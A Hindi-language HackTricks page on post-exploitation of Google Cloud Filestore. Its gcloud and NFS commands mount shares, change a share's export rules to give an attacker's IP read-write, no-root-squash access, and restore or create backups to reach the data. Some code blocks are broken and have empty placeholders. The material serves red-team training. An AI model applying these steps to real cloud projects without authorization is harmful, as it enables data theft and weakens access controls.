GCP - Filestore पोस्ट-एक्सप्लॉइटेशन

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Filestore

Filestore के बारे में अधिक जानकारी के लिए देखें:

GCP - Filestore Enum

Filestore माउंट करें

एक साझा फ़ाइलसिस्टम संवेदनशील जानकारी हो सकती है जो एक हमलावर के दृष्टिकोण से रुचिकर हो सकती है। Filestore तक पहुँच होने पर इसे माउंट करना संभव है:

Filestore फ़ाइलसिस्टम को माउंट करें ```bash sudo apt-get update sudo apt-get install nfs-common # Check the share name showmount -e # Mount the share mkdir /mnt/fs sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs ```

filestore instance के IP address को खोजने के लिए पेज के enumeration सेक्शन को देखें:

GCP - Filestore Enum

प्रतिबंध हटाएँ और अतिरिक्त permissions प्राप्त करें

यदि attacker उस IP address पर नहीं है जिसे share पर access है, लेकिन आपके पास उसे modify करने के लिए पर्याप्त permissions हैं, तो प्रतिबंधों को हटाना या उस पर access बदलना संभव है। आप अपने IP address को अधिक privileges दे कर share पर admin access प्राप्त कर सकते हैं:

Filestore instance को access की अनुमति देने के लिए अपडेट करें ```bash gcloud filestore instances update nfstest \ --zone= \ --flags-file=nfs.json

Contents of nfs.json

{ “–file-share”: { “capacity”: “1024”, “name”: “”, “nfs-export-options”: [ { “access-mode”: “READ_WRITE”, “ip-ranges”: [ “/32” ], “squash-mode”: “NO_ROOT_SQUASH”, “anon_uid”: 1003, “anon_gid”: 1003 } ] } }

</details>

### बैकअप पुनर्स्थापित करें

यदि कोई backup मौजूद है तो इसे किसी मौजूदा या नए instance में **पुनर्स्थापित किया जा सकता है** ताकि इसकी **जानकारी उपलब्ध हो जाए:**

<details>

<summary>नया instance बनाएं और backup पुनर्स्थापित करें</summary>
```bash
# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

एक backup बनाकर उसे restore करें

यदि आप किसी share पर पहुँच नहीं रखते और उसे संशोधित नहीं करना चाहते हैं, तो इसकी backup बना कर और पहले बताए अनुसार इसे restore करना संभव है:

नई instance में backup बनाकर उसे restore करें ```bash # Create share backup gcloud filestore backups create \ --region= \ --instance= \ --instance-zone= \ --file-share=

Follow the previous section commands to restore it and mount it

</details>

> [!TIP]
> AWS हैकिंग सीखें और अभ्यास करें:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> GCP हैकिंग सीखें और अभ्यास करें: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Azure हैकिंग सीखें और अभ्यास करें: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>HackTricks का समर्थन करें</summary>
>
> - [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जांच करें!
> - **हमारे** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या **हमें** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो करें।**
> - **हैकिंग ट्रिक्स साझा करें, PRs को** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) गिटहब रिपोजिटरी में सबमिट करके।
>
> </details>